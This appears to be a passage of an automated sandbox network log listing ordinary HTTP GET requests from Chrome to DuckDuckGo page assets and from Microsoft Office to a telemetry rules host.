Source: global trafficHTTP traffic detected: GET /_next/static/media/play-store.e5d5ed36.png HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/78597.c875db33140f7df5.js HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/homepage-btf-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/media/chrome-lg.a4859fb2.png HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/edge-lg.36af7682.png HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/media/windows.477fa143.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/macos.61889438.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/firefox-lg.8efad702.png HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/opera-lg.237c4418.png HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/media/safari-lg.8406694a.png HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/search-protection-ios-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/homepage-btf-mobile-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/app-store.501fe17a.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/play-store.e5d5ed36.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/web-protection-back-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/media/chrome-lg.a4859fb2.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/web-protection-front-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/edge-lg.36af7682.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/web-protection-ios-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/email-protection-front-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/email-protection-back-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/email-protection-ios-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/opera-lg.237c4418.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/firefox-lg.8efad702.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/search-protection-front-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/search-protection-ios-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/media/safari-lg.8406694a.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/search-protection-back-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/web-protection-front-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/app-protection-back-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/web-protection-back-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/app-protection-front-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/app-protection-android-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/33817-15efb19a99b7ec93.js HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/email-protection-front-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/email-protection-back-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/email-protection-ios-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /windows?origin=funnel_home___hero HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
